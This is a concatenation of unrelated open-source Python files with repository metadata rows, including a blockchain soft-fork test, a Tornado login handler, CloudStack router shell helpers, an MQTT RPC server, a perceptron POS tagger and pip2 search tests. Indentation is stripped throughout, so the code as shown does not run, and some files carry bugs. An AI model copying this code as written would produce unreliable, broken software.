stop_nodes(self.nodes)
wait_deuscoinds()
shutil.rmtree(self.options.tmpdir)
self.setup_chain()
self.setup_network()
self.test.clear_all_connections()
self.test.add_all_connections(self.nodes)
NetworkThread().start() # Start up network handling in another thread
def get_tests(self):
for test in itertools.chain(
self.test_BIP('csv', 536870913, self.sequence_lock_invalidate, self.donothing),
self.test_BIP('csv', 536870913, self.mtp_invalidate, self.donothing),
self.test_BIP('csv', 536870913, self.donothing, self.csv_invalidate)
):
yield test
def donothing(self, tx):
return
def csv_invalidate(self, tx):
'''Modify the signature in vin 0 of the tx to fail CSV
Prepends -1 CSV DROP in the scriptSig itself.
'''
tx.vin[0].scriptSig = CScript([OP_1NEGATE, OP_NOP3, OP_DROP] +
list(CScript(tx.vin[0].scriptSig)))
def sequence_lock_invalidate(self, tx):
'''Modify the nSequence to make it fails once sequence lock rule is activated (high timespan)
'''
tx.vin[0].nSequence = 0x00FFFFFF
tx.nLockTime = 0
def mtp_invalidate(self, tx):
'''Modify the nLockTime to make it fails once MTP rule is activated
'''
# Disable Sequence lock, Activate nLockTime
tx.vin[0].nSequence = 0x90FFFFFF
tx.nLockTime = self.last_block_time
if __name__ == '__main__':
BIP9SoftForksTest().main() | mit | 258,358,214,866,683,870 | 38.968182 | 110 | 0.645018 | false |
gooftroop/Zeus | ef5/lib/handlers/authentication.py | 1 | 5728 | """
"""
import logging
import settings
import tornado.gen as gen
from lib.auth import login, logout, is_authenticated
from lib.error.exceptions import AuthenticationError
class LoginHandler(BaseHandler):
"""
TODO
As designed, Tornado is stateless, which means that everything goes back to client
This can be unsecure, so in the future we might consider patching Tornado to check
session if xsrf, element session id, and current user is not in a cookie(s)
"""
logger = logging.getLogger("auth")
def get_setup_mode(self):
try:
with open("/tmp/fcemode", "r") as myfile:
return myfile.read()
except (IOError, Exception) as e:
self.logger.warning("Unable to open setupmode file: {0}".format(e))
return None
def get(self):
# Set client headers
self.set_header('Content-Type', 'application/json')
self.set_header(settings.XSRF_TOKEN, self.xsrf_token)
response = {}
########################################################################################################
# Get setup mode
########################################################################################################
ret = self.get_setup_mode()
self.logger.info("Server in initial setup mode? {0}".format((ret is not None)))
response["initial-setup-mode"] = ret is not None
########################################################################################################
# Get serial number
########################################################################################################
response["serial-number"] = ret if ret else ""
########################################################################################################
# Get hostname
########################################################################################################
proc = subprocess.Popen(["hostname"], stdout=subprocess.PIPE, shell=True)
(out, err) = proc.communicate()
if err is not None:
self.logger.error(err)
response["hostname"] = out
self.response.respond(response)
@gen.coroutine
# TODO HTTP basic auth support
def post(self):
username = None
try:
username = self.request.body_arguments["username"]
if isinstance(username, list):
username = username[0]
except (web.MissingArgumentError, KeyError) as e:
pass
# Fall through to check existence of password
try:
password = self.request.body_arguments["password"]
if isinstance(password, list):
password = password[0]
if not username:
msg = "Username is required"
self.logger.error(msg)
self.send_error(status_code=401, reason=msg)
return
except (web.MissingArgumentError, KeyError) as e:
# Attempt to use HTTP Basic Auth
basic_auth = self.request.headers.get('Authorization')
if not basic_auth or not basic_auth.startswidth('Basic'):
msg = "Username and Password are required" if not username else "Password is required"
self.logger.error(msg)
self.send_error(status_code=401, reason=msg)
return
else:
decoded = base64.decodestring(basic_auth[6:])
username, password = decoded.split(':', 2)
self.clear_header('Authorization')
try:
yield login(self, username, password)
# Now that we've authenticated, get the setup mode and serial number
# TODO the following is similar to atlasHandler.get. Let's see if we can generalize
# TODO convert strings to consts
# TODO this relies on hard coded context 'default' - this needs to be dynamic
try:
# TODO This needs to be converted to using the Element DAO
connection = ElementXMLRPC(url=settings.ELEMENT_URL,
session_id=self._new_cookie.get(settings.ELEMENT_SESSION_ID).value)
self.response.respond({"message": "Login Successful"})
except ElementError as e:
msg = "An error occurred while connecting to Element '{0}': {1}".format(type, e)
self.logger.exception(msg)
self.redirect("/atlas/api/logout", permanent=True)
except AuthenticationError as e:
# TODO we should check to see if we can resolve any messages coming from pam to readable messages
msg = "Login Failed. {0}".format(str(e))
self.logger.error(msg)
self.logger.error(traceback.format_exc())
self.send_error(status_code=401, reason=msg)
except Exception as e:
msg = "Login Failed. {0}".format(str(e))
self.logger.error(msg)
self.logger.error(traceback.format_exc())
self.send_error(status_code=401, reason=msg)
class LogoutHandler(BaseHandler):
"""
"""
logger = logging.getLogger("auth")
@gen.coroutine
def get(self):
"""
:return:
"""
try:
yield logout(self)
self.clear_cookie(settings.XSRF_TOKEN)
self.response.respond({"message": "Logout Successful"})
except AuthenticationError as e:
msg = "Logout Failed. {0}".format(str(e))
self.logger.error(msg)
self.send_error(status_code=400, reason=msg)
| mit | -561,951,879,802,041,500 | 36.933775 | 112 | 0.516585 | false |
jcshen007/cloudstack | systemvm/patches/debian/config/opt/cloud/bin/cs/CsHelper.py | 1 | 7368 | # -- coding: utf-8 --
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" General helper functions
for use in the configuration process
"""
import subprocess
import logging
import os.path
import re
import shutil
from netaddr import *
from pprint import pprint
PUBLIC_INTERFACES = {"router" : "eth2", "vpcrouter" : "eth1"}
STATE_COMMANDS = {"router" : "ip addr | grep eth0 | grep inet | wc -l | xargs bash -c 'if [ $0 == 2 ]; then echo \"MASTER\"; else echo \"BACKUP\"; fi'",
"vpcrouter" : "ip addr | grep eth1 | grep state | awk '{print $9;}' | xargs bash -c 'if [ $0 == \"UP\" ]; then echo \"MASTER\"; else echo \"BACKUP\"; fi'"}
def reconfigure_interfaces(router_config, interfaces):
for interface in interfaces:
cmd = "ip link show %s | grep 'state DOWN'" % interface.get_device()
for device in execute(cmd):
if " DOWN " in device:
cmd = "ip link set %s up" % interface.get_device()
# If redundant only bring up public interfaces that are not eth1.
# Reason: private gateways are public interfaces.
# master.py and keepalived will deal with eth1 public interface.
if router_config.is_redundant() and interface.is_public():
state_cmd = STATE_COMMANDS[router_config.get_type()]
logging.info("Check state command => %s" % state_cmd)
state = execute(state_cmd)[0]
logging.info("Route state => %s" % state)
if interface.get_device() != PUBLIC_INTERFACES[router_config.get_type()] and state == "MASTER":
execute(cmd)
else:
execute(cmd)
def is_mounted(name):
for i in execute("mount"):
vals = i.lstrip().split()
if vals[0] == "tmpfs" and vals[2] == name:
return True
return False
def mount_tmpfs(name):
if not is_mounted(name):
execute("mount tmpfs %s -t tmpfs" % name)
def umount_tmpfs(name):
if is_mounted(name):
execute("umount %s" % name)
def rm(name):
os.remove(name) if os.path.isfile(name) else None
def rmdir(name):
if name:
shutil.rmtree(name, True)
def mkdir(name, mode, fatal):
try:
os.makedirs(name, mode)
except OSError as e:
if e.errno != 17:
print "failed to make directories " + name + " due to :" + e.strerror
if(fatal):
sys.exit(1)
def updatefile(filename, val, mode):
""" add val to file """
handle = open(filename, 'r')
for line in handle.read():
if line.strip().lstrip() == val:
return
# set the value
handle.close()
handle = open(filename, mode)
handle.write(val)
handle.close()
def bool_to_yn(val):
if val:
return "yes"
return "no"
def get_device_info():
""" Returns all devices on system with their ipv4 ip netmask """
list = []
for i in execute("ip addr show"):
vals = i.strip().lstrip().rstrip().split()
if vals[0] == "inet":
to = {}
to['ip'] = vals[1]
to['dev'] = vals[-1]
to['network'] = IPNetwork(to['ip'])
to['dnsmasq'] = False
list.append(to)
return list
def get_domain():
for line in open("/etc/resolv.conf"):
vals = line.lstrip().split()
if vals[0] == "domain":
return vals[1]
return "cloudnine.internal"
def get_device(ip):
""" Returns the device which has a specific ip
If the ip is not found returns an empty string
"""
for i in execute("ip addr show"):
vals = i.strip().lstrip().rstrip().split()
if vals[0] == "inet":
if vals[1].split('/')[0] == ip:
return vals[-1]
return ""
def get_ip(device):
""" Return first ip on an interface """
cmd = "ip addr show dev %s" % device
for i in execute(cmd):
vals = i.lstrip().split()
if (vals[0] == 'inet'):
return vals[1]
return ""
def definedinfile(filename, val):
""" Check if val is defined in the file """
for line in open(filename):
if re.search(val, line):
return True
return False
def addifmissing(filename, val):
""" Add something to a file
if it is not already there """
if not os.path.isfile(filename):
logging.debug("File %s doesn't exist, so create" % filename)
open(filename, "w").close()
if not definedinfile(filename, val):
updatefile(filename, val + "\n", "a")
logging.debug("Added %s to file %s" % (val, filename))
return True
return False
def get_hostname():
for line in open("/etc/hostname"):
return line.strip()
def execute(command):
""" Execute command """
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
p.wait()
rc = p.returncode
logging.debug("Executed: %s - exitstatus=%s " % (command, rc))
result = p.communicate()[0]
return result.splitlines()
def save_iptables(command, iptables_file):
""" Execute command """
logging.debug("Saving iptables for %s" % command)
result = execute(command)
fIptables = open(iptables_file, "w+")
for line in result:
fIptables.write(line)
fIptables.write("\n")
fIptables.close()
def execute2(command):
""" Execute command """
logging.debug("Executing: %s" % command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
p.wait()
return p
def service(name, op):
execute("service %s %s" % (name, op))
logging.info("Service %s %s" % (name, op))
def start_if_stopped(name):
ret = execute2("service %s status" % name)
if ret.returncode:
execute2("service %s start" % name)
def hup_dnsmasq(name, user):
pid = ""
for i in execute("ps -ef | grep %s" % name):
vals = i.lstrip().split()
if (vals[0] == user):
pid = vals[1]
if pid:
logging.info("Sent hup to %s", name)
execute("kill -HUP %s" % pid)
else:
service("dnsmasq", "start")
def copy_if_needed(src, dest):
""" Copy a file if the destination does not already exist
"""
if os.path.isfile(dest):
return
copy(src, dest)
def copy(src, dest):
"""
copy source to destination.
"""
try:
shutil.copy2(src, dest)
except IOError:
logging.Error("Could not copy %s to %s" % (src, dest))
else:
logging.info("Copied %s to %s" % (src, dest))
| apache-2.0 | -8,724,128,362,881,490,000 | 28.007874 | 173 | 0.588626 | false |
ah744/ScaffCC_RKQC | rkqc/tools/embed_truth_table.py | 1 | 1594 | #!/home/adam/Documents/revkit-1.3/python
#!/usr/bin/python
# RevKit: A Toolkit for Reversible Circuit Design (www.revkit.org)
# Copyright (C) 2009-2011 The RevKit Developers <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, os
sys.path.append(os.path.dirname(sys.path[0]))
from revkit import *
opts = program_options()
opts.add_option( "filename", "PLA filename containing an irreversible function specification" ) \
.add_option( "specname", "Filename where to write the embedded specification" ) \
.add_option( "garbage_name", "g", "Name for the garbage lines added with embedding the specification" )
opts.parse( sys.argv )
if not( opts.good() and opts.is_set( "filename" ) and opts.is_set( "specname" ) ):
print opts
exit( 1 )
base = binary_truth_table()
spec = binary_truth_table()
read_pla( base, opts["filename"] )
embed_truth_table( spec, base, garbage_name = opts["garbage_name"] )
write_specification( spec, opts["specname"] )
| bsd-2-clause | 4,276,062,404,617,988,000 | 36.952381 | 107 | 0.732748 | false |
contactless/mqtt-rpc | python/server.py | 1 | 2415 | #!/usr/bin/python
import argparse
try:
import mosquitto
except ImportError:
import paho.mqtt.client as mosquitto
import time, random
import sys
from mqttrpc import MQTTRPCResponseManager, dispatcher
import logging
logging.getLogger().setLevel(logging.DEBUG)
@dispatcher.add_method
def foobar(**kwargs):
return kwargs["foo"] + kwargs["bar"]
class TMQTTRPCServer(object):
def __init__(self, client, driver_id):
self.client = client
self.driver_id = driver_id
def on_mqtt_message(self, mosq, obj, msg):
print msg.topic
print msg.payload
parts = msg.topic.split('/')
driver_id = parts[3]
service_id = parts[4]
method_id = parts[5]
client_id = parts[6]
response = MQTTRPCResponseManager.handle(msg.payload, service_id, method_id, dispatcher)
self.client.publish("/rpc/v1/%s/%s/%s/%s/reply" % (self.driver_id, service_id, method_id, client_id ), response.json)
def setup(self):
for service, method in dispatcher.iterkeys():
self.client.publish("/rpc/v1/%s/%s/%s" % (self.driver_id, service, method), "1", retain=True)
self.client.subscribe("/rpc/v1/%s/%s/%s/+" % (self.driver_id, service, method))
# Dispatcher is dictionary {<method_name>: callable}
dispatcher[("test", "echo")] = lambda s: s
dispatcher[("test", "add")] = lambda a, b: a + b
if __name__ =='__main__':
parser = argparse.ArgumentParser(description='Sample RPC server', add_help=False)
parser.add_argument('-h', '--host', dest='host', type=str,
help='MQTT host', default='localhost')
parser.add_argument('-u', '--username', dest='username', type=str,
help='MQTT username', default='')
parser.add_argument('-P', '--password', dest='password', type=str,
help='MQTT password', default='')
parser.add_argument('-p', '--port', dest='port', type=int,
help='MQTT port', default='1883')
args = parser.parse_args()
client = mosquitto.Mosquitto()
if args.username:
client.username_pw_set(args.username, args.password)
rpc_server = TMQTTRPCServer(client, 'Driver')
client.connect(args.host, args.port)
client.on_message = rpc_server.on_mqtt_message
rpc_server.setup()
while 1:
rc = client.loop()
if rc != 0:
break
| mit | -7,693,251,067,194,599,000 | 24.691489 | 125 | 0.612422 | false |
muyeby/NLP | Tagger/PerceptronTagger/PerceptronClassifier.py | 1 | 11234 | #!/usr/bin/env python
# encoding: utf-8
"""
@version: V1.2
@author: muyeby
@contact: [email protected]
@site: http://muyeby.github.io
@software: PyCharm
@file: assignment2.py
@time: 16-7-7 下午8:44
"""
from __future__ import print_function
from copy import copy
import time
class PerceptronClassifier(object):
# The perceptron classifier
def __init__(self, max_iter=10, training_data=None, devel_data=None):
'''
Parameters
----------
max_iter: int
The max number of iteration
training_data: list
The training data
devel_data: list
The development data, to determine the best iteration.
'''
self.max_iter = max_iter
self.learnRate = 1
if training_data is not None:
self.fit(training_data, devel_data)
def fit(self, training_data, devel_data=None):
'''
Estimate the parameters for perceptron model. For multi-class perceptron, parameters can be
treated as a T \times D matrix W, where T is the number of labels and D is the number of
features.
'''
# feature_alphabet is a mapping from feature string to it's dimension in the feature space,
# e.g. feature_alphabet['U1=I']=3, which means 'U1=I' is in the third column of W
#
# W = [[ . . 1 . . .],
# ...
# [ . . 1 . . .]]
# ^
# |
# 'U1=I'
self.feature_alphabet = {'None': 0}
self.label_alphabet = {}
# Extract features, build the feature_alphabet, label_alphabet and training instance pairs.
# Each instance consist a tuple (X, Y) where X is the mapped features (list(int)), and Y is
# the index of the corresponding label.
instances = []
for words, tags in training_data:
L = len(words)
prev = '<s>'
for i in range(L):
# Your code here, extract features and give it into X, convert POStag to index and
# give it to Y
X = self.extract_features(words, i, prev)
Y = len(self.label_alphabet) if tags[i] not in self.label_alphabet.keys() else self.label_alphabet[tags[i]]
instances.append((X, Y))
if tags[i] not in self.label_alphabet.keys():
self.label_alphabet[tags[i]] = len(self.label_alphabet)
prev = tags[i]
# Build a mapping from index to label string to recover POStags.
self.labels = [-1 for k in self.label_alphabet]
for k in self.label_alphabet:
self.labels[self.label_alphabet[k]] = k
self.D, self.T = len(self.feature_alphabet), len(self.label_alphabet)
print('number of features : %d' % self.D)
print('number of labels: %d' % self.T)
# Allocate the weight matrix W
self.W = [[0 for j in range(self.D)] for i in range(self.T)]
self.best_W = copy(self.W)
best_acc = 0
for it in range(self.max_iter):
# The training part,
n_errors = 0
print('training iteration #%d' % it)
for X, Y in instances:
# Your code here, ake a prediction and give it to Z
Z = self._predict(X)
if Z != Y:
# print '初始预测:', Z, self._score(X, Z), 'Y的分数', self._score(X, Y)
# print self.W[Y]
tmp = self._score(X,Y)
# Your code here. If the predict is incorrect, perform the perceptron update
n_errors += 1
for x in X:
self.W[Y][x] =self.W[Y][x] + 1*self.learnRate
# The perceptron update part.
for i in range(self.T):
if self._score(X, i) >= tmp and i!=Y:
for x in X:
self.W[i][x] = self.W[i][x] - 1 * self.learnRate
# print '调整后:',self._predict(X),'正确:',Y,'Y的分数',self._score(X,Y)
print('training error %d' % n_errors)
if devel_data is not None:
# Test accuracy on the development set if provided.
n_corr, n_total = 0, 0
for words, tags in devel_data:
prev = '<s>'
for i in range(len(words)):
Z = self.predict(words, i, prev)
Y = self.label_alphabet[tags[i]]
if Z == Y:
n_corr += 1
n_total += 1
prev = self.labels[Z]
print('accuracy: %f' % (float(n_corr) / n_total))
# print 'W0',self.W[10][:100]
if best_acc < float(n_corr) / n_total:
# If this round is better than before, save it.
best_acc = float(n_corr) / n_total
self.best_W = copy(self.W)
if self.best_W is None:
self.best_W = copy(self.W)
def extract_features(self, words, i, prev_tag=None, add=True):
'''
Extract features from words and prev POS tag, if `add` is True, also insert the feature
string to the feature_alphabet.
Parameters
----------
words: list(str)
The words list
i: int
The position
prev_tag: str
Previous POS tag
add: bool
If true, insert the feature to feature_alphabet.
Return
------
mapped_features: list(int)
The list of hashed features.
'''
L = len(words)
context = ['<s>' if i - 2 < 0 else words[i - 2],
'<s>' if i - 1 < 0 else words[i - 1],
words[i],
'<e>' if i + 1 >= L else words[i + 1],
'<e>' if i + 2 >= L else words[i + 1]]
raw_features = ['U1=%s' % context[0],
'U2=%s' % context[1],
'U3=%s' % context[2],
'U4=%s' % context[3],
'U5=%s' % context[4],
'U1,2=%s/%s' % (context[0], context[1]),
'U2,3=%s/%s' % (context[1], context[2]), # Your code here, extract the bigram raw feature,
'U3,4=%s/%s' % (context[2], context[3]), # Your code here, extract the bigram raw feature,
'U4,5=%s/%s' % (context[3], context[4]), # Your code here, extract the bigram raw feature,
]
if prev_tag is not None:
raw_features.append('B=%s' % prev_tag)
mapped_features = []
for f in raw_features:
if add and (f not in self.feature_alphabet):
# Your code here, insert the feature string to the feature_alphabet.
index = len(self.feature_alphabet)
self.feature_alphabet[f] = index
# Your code here, map the string feature to index.
# for item in self.feature_alphabet.values():
# mapped_features[self.feature_alphabet[item]] = 1
if f in self.feature_alphabet:
mapped_features.append(self.feature_alphabet[f])
return mapped_features
def _score(self, features, t):
'''
Calcuate score from the given features and label t
Parameters
----------
features: list(int)
The hashed features
t: int
The index of label
Return
------
s: int
The score
'''
# Your code here, compute the score.
s=0.0
for x in features:
s += self.W[t][x]
return s
def _predict(self, features):
'''
Calcuate score from the given features and label t
Parameters
----------
features: list(int)
The hashed features
t: int
The index of label
Return
------
best_y: int
The highest scored label's index
'''
pred_scores = [self._score(features, y) for y in range(self.T)]
best_score, best_y = -1e5, -1
# Your code here, find the highest scored class from pred_scores
# best_score = pred_scores[0]
# best_y = 0
for index,value in enumerate(pred_scores):
if value > best_score:
best_score = value
best_y = index
# print 'best:',best_score,best_y
# print max([math.fabs(sc - 10) for sc in pred_scores])
return best_y
def predict(self, words, i, prev_tag=None):
'''
Make prediction on list of words
Parameters
----------
words: list(str)
The words list
i: int
The position
prev_tag: str
Previous POS tag
Return
------
y: int
The predicted label's index
'''
X = self.extract_features(words, i, prev_tag, False)
y = self._predict(X)
return y
def greedy_search(words, classifier):
'''
Perform greedy search on the classifier.
Parameters
----------
words: list(str)
The word list
classifier: PerceptronClassifier
The classifier object.
'''
prev = '<s>'
ret = []
for i in range(len(words)):
# Your code here, implement the greedy search,
label = classifier.predict(words,i,prev)
ret.append(classifier.labels[label])
prev = classifier.labels[label]
return ret
from dataset import read_dataset
print (time.strftime('%Y-%m-%d %H:%M:%S'))
train_dataset = read_dataset('./penn.train.pos.gz')
devel_dataset = read_dataset('./penn.devel.pos.gz')
print('%d is training sentences.' % len(train_dataset))
print('%d is development sentences.' % len(devel_dataset))
perceptron = PerceptronClassifier(max_iter=1, training_data=train_dataset, devel_data=devel_dataset)
print('========================TEST CASE1==========================')
n_corr, n_total = 0, 0
for devel_data in devel_dataset:
devel_data_x, devel_data_y = devel_data
pred_y = greedy_search(devel_data_x, perceptron)
for pred_tag, corr_tag in zip(pred_y, devel_data_y):
if pred_tag == corr_tag:
n_corr += 1
n_total += 1
print("accuracy: %f" % (float(n_corr)/ n_total))
print('========================TEST CASE2==========================')
print (greedy_search(['HMM', 'is', 'a', 'widely', 'used', 'model', '.'], perceptron))
print (greedy_search(['I', 'like', 'cat', ',', 'but', 'I', 'hate', 'eating', 'fish', '.'], perceptron))
print('========================TEST CASE3==========================')
test_dataset = read_dataset('./penn.test.pos.blind.gz')
fpo=open('./penn.test.perceptron.pos.out', 'w')
for test_data_x, test_data_y in test_dataset:
pred_y = greedy_search(test_data_x, perceptron)
print(" ".join(y for y in pred_y), file=fpo)
fpo.close()
print('Mission complete!')
print (time.strftime('%Y-%m-%d %H:%M:%S')) | mit | 1,610,744,026,520,288,800 | 34.539683 | 123 | 0.506343 | false |
PanDAWMS/panda-server | pandaserver/taskbuffer/ErrorCode.py | 1 | 1738 | ############## errror code
# killed
EC_Kill = 100
# transfer timeout
EC_Transfer = 101
# expire
EC_Expire = 102
# aborted
EC_Aborted = 103
# wait timeout
EC_WaitTimeout = 104
# reassigned by rebrokeage
EC_Reassigned = 105
# reassigned by server-side retry
EC_Retried = 106
# retried by pilot
EC_PilotRetried = 107
# lost file (=dataservice.ErrorCode.EC_LostFile)
EC_LostFile = 110
# retried for event service
EC_EventServiceRetried = 111
# merge for event service
EC_EventServiceMerge = 112
# merge job failed
EC_MergeFailed = 113
# max attempt reached for Event Service
EC_EventServiceMaxAttempt = 114
# do nothing since other consumers are still running
EC_EventServiceWaitOthers = 115
# killed since unused and unnecessary any more
EC_EventServiceUnused = 116
# didn't process any events on WN
EC_EventServiceUnprocessed = 117
# didn't process any events on WN and last consumer
EC_EventServiceLastUnprocessed = 118
# all event ranges failed
EC_EventServiceAllFailed = 119
# associated consumer generated ES merge
EC_EventServiceKillOK = 120
# associated consumer failed
EC_EventServiceKillNG = 121
# killed for preemption
EC_EventServicePreemption = 122
# retred but didn't process any events on WN
EC_EventServiceNoEvent = 123
# input files inconsitent with JEDI
EC_EventServiceInconsistentIn = 124
# No event service queues available for new consumers
EC_EventServiceNoEsQueues = 125
# Closed in bad job status
EC_EventServiceBadStatus = 126
# failed to lock semaphore for job cloning
EC_JobCloningUnlock = 200
# worker is done before job is done
EC_WorkerDone = 300
# file not found
class EC_NotFound:
pass
# file relocated
class EC_Redirect:
def __init__(self,url):
self.url = url
| apache-2.0 | 3,461,998,897,724,639,700 | 17.688172 | 53 | 0.758343 | false |
coteyr/home-assistant | homeassistant/components/rollershutter/demo.py | 1 | 2390 | """
Demo platform for the rollor shutter component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
from homeassistant.components.rollershutter import RollershutterDevice
from homeassistant.const import EVENT_TIME_CHANGED
from homeassistant.helpers.event import track_utc_time_change
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Demo roller shutters."""
add_devices([
DemoRollershutter(hass, 'Kitchen Window', 0),
DemoRollershutter(hass, 'Living Room Window', 100),
])
class DemoRollershutter(RollershutterDevice):
"""Represents a roller shutter."""
# pylint: disable=no-self-use
def __init__(self, hass, name, position):
self.hass = hass
self._name = name
self._position = position
self._moving_up = True
self._listener = None
@property
def name(self):
"""Returns the name of the roller shutter."""
return self._name
@property
def should_poll(self):
"""No polling needed for a demo roller shutter."""
return False
@property
def current_position(self):
"""Return the current position of the roller shutter."""
return self._position
def move_up(self, **kwargs):
"""Move the roller shutter down."""
if self._position == 0:
return
self._listen()
self._moving_up = True
def move_down(self, **kwargs):
"""Move the roller shutter up."""
if self._position == 100:
return
self._listen()
self._moving_up = False
def stop(self, **kwargs):
"""Stops the roller shutter."""
if self._listener is not None:
self.hass.bus.remove_listener(EVENT_TIME_CHANGED, self._listener)
self._listener = None
def _listen(self):
"""Listen for changes."""
if self._listener is None:
self._listener = track_utc_time_change(self.hass,
self._time_changed)
def _time_changed(self, now):
"""Track time changes."""
if self._moving_up:
self._position -= 10
else:
self._position += 10
if self._position % 100 == 0:
self.stop()
self.update_ha_state()
| mit | -3,810,794,242,415,817,000 | 27.795181 | 77 | 0.593305 | false |
osupython/pip2 | tests/test_search.py | 1 | 8658 | import inspect
import sys
from io import StringIO
import pip2.commands.freeze
import pip2.commands.search
import tests.log
from pip2.compat import mock
from pip2.compat import packaging
@mock.patch.object(pip2.commands.freeze, 'freeze')
@mock.patch.object(packaging.pypi.xmlrpc.Client, 'search_projects')
class TestSearchAPI():
def setup(self):
test_proj1 = mock.Mock()
test_proj1.name = 'test_proj1'
test_proj1.releases = mock.MagicMock()
test_proj1.releases[0].version = '1.5'
test_proj1.releases[0].metadata = {}
test_proj1.releases[0].metadata['summary'] = 'Summary for project 1'
test_proj2 = mock.Mock()
test_proj2.name = 'test_proj2'
test_proj2.releases = mock.MagicMock()
test_proj2.releases[0].version = '2.5'
test_proj2.releases[0].metadata = {}
test_proj2.releases[0].metadata['summary'] = 'Summary for project 2'
test_proj3 = mock.Mock()
test_proj3.name = 'test_proj3'
test_proj3.releases = mock.MagicMock()
test_proj3.releases[0].version = '3.5'
test_proj3.releases[0].metadata = {}
test_proj3.releases[0].metadata['summary'] = 'Summary for project 3'
return [test_proj1, test_proj2, test_proj3]
def test_basic_search(self, mock_search_projects, mock_freeze):
mock_search_projects.return_value = self.setup()
mock_freeze.return_value = {}
expected = {'test_proj1': {'summary': 'Summary for project 1'},
'test_proj2': {'summary': 'Summary for project 2'},
'test_proj3': {'summary': 'Summary for project 3'}}
result = pip2.commands.search.search('test')
self.tear_down(result, expected)
def test_basic_search_matches(self, mock_search_projects, mock_freeze):
mock_search_projects.return_value = self.setup()
mock_freeze.return_value = {'test_proj1': {'version': '1.0'},
'test_proj3': {'version': '3.0'}}
expected = {'test_proj1': {'summary': 'Summary for project 1',
'installed_version': '1.0',
'latest_version': '1.5'},
'test_proj2': {'summary': 'Summary for project 2'},
'test_proj3': {'summary': 'Summary for project 3',
'installed_version': '3.0',
'latest_version': '3.5'}}
result = pip2.commands.search.search('test')
self.tear_down(result, expected)
def tear_down(self, result, expected):
try:
assert result == expected
except AssertionError:
print('result : {0}'.format(result))
print('expected: {0}'.format(expected))
raise
@mock.patch.object(pip2.util, 'getTerminalSize')
@mock.patch.object(pip2.commands.search, 'search')
class TestSearchCLI():
min_term_width = 40
default_term_width = 80
term_width = default_term_width
name_len = 26
sep = ' - '
sep_len = len(sep)
sum_len = term_width - name_len - sep_len - 1
args = mock.Mock()
args.project = 'pkgPlaceholder'
def setup(self):
result = tests.log.setup_logger()
return result
def test_basic_display_no_results(self, mock_search, mock_getTerminalSize):
result = self.setup()
self.args.project = 'nonexistantproject'
mock_getTerminalSize.return_value = (self.term_width, None)
mock_search.return_value = {}
expected = 'Search returned no results...\n'
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_name_short(self, mock_search, mock_getTerminalSize):
result = self.setup()
self.args.project = 'shortproject'
mock_getTerminalSize.return_value = (self.term_width, None)
mock_search.return_value = {self.args.project: {'summary': 'sum'}}
expected = self.args.project
expected += ' ' * (self.name_len - len(expected)) + self.sep + 'sum\n'
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_name_long(self, mock_search, mock_getTerminalSize):
result = self.setup()
self.args.project = 'thisIsAVeryLongprojectThatCantDisplayFully'
mock_getTerminalSize.return_value = (self.term_width, None)
mock_search.return_value = {self.args.project: {'summary': 'sum'}}
expected = self.args.project + self.sep + 'sum'
expected = expected[: (self.sum_len + self.name_len +
self.sep_len)] + '\n'
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_sum_single_line(self, mock_search,
mock_getTerminalSize):
result = self.setup()
self.args.project = 'pkgPlaceholder'
mock_getTerminalSize.return_value = (self.term_width, None)
desc = 'X' * (self.sum_len)
mock_search.return_value = {self.args.project: {'summary': desc}}
expected = (self.args.project + ' ' * (self.name_len -
len(self.args.project)) + self.sep + desc + '\n')
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_sum_word_wrap(self, mock_search,
mock_getTerminalSize):
result = self.setup()
self.args.project = 'pkgPlaceholder'
mock_getTerminalSize.return_value = (self.term_width, None)
desc = 'X' * int(self.sum_len * 1.5)
mock_search.return_value = {self.args.project: {'summary': desc}}
desc_ln1 = desc[: self.sum_len]
desc_ln2 = desc[len(desc_ln1):]
expected = (self.args.project + ' ' * (self.name_len -
len(self.args.project)) + self.sep + desc_ln1 + '\n' +
' ' * (self.name_len + self.sep_len) + desc_ln2 + '\n')
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_matches(self, mock_search, mock_getTerminalSize):
result = self.setup()
self.args.project = 'pkgPlaceholder'
mock_getTerminalSize.return_value = (self.term_width, None)
installed = '1.0'
latest = '1.5'
desc = 'X' * self.sum_len
mock_search.return_value = {self.args.project: {'summary': desc,
'installed_version': installed,
'latest_version': latest}}
expected = (self.args.project + ' ' * (self.name_len -
len(self.args.project)) + self.sep + desc +
'\n\tINSTALLED: ' + installed + '\n\tLATEST : ' +
latest + '\n')
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
# System level test. Runs all previous tests at different terminal sizes.
def test_system_display_terminal_scale(self, mock_search,
mock_getTerminalSize):
# test case:
# 35 - too small must be min of 40
# 60 - small term
# 180 - large term
term_widths = [35, 60, 180]
for term_width in term_widths:
self.term_width = term_width
if self.term_width >= self.min_term_width:
width_used = self.term_width
else:
width_used = self.min_term_width
self.sum_len = width_used - self.name_len - self.sep_len - 1
self._run_all_project_tests()
self.term_width = self.default_term_width
